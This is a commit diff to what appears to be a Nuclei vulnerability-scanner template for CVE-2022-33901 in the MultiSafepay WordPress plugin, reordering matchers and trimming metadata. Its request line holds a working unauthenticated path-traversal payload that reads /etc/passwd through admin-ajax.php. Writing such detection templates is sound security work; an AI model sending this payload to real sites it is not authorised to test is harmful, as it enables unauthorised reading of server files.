Update CVE-2022-33901.yaml

2022-10-21 16:04:12 +05:30 · 2022-10-21 16:04:12 +05:30 · 4d35f7c8eb
parent 67851d5c3d
commit 4d35f7c8eb
1 changed files with 10 additions and 11 deletions
--- a/cves/2022/CVE-2022-33901.yaml
+++ b/cves/2022/CVE-2022-33901.yaml
@ -10,29 +10,28 @@ info:
    - https://wordpress.org/plugins/multisafepay/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33901
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
    cve-id: CVE-2022-33901
  metadata:
-    verified: "true"
-  tags: wp-plugin,wp,fileread,unauth,wpscan,cve2022,wordpress,cve,multisafepay
+    verified: true
+  tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"

+    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

-      - type: regex
-        part: body
-        regex:
-          - "root:.*:0:0:"
+      - type: status
+        status:
+          - 200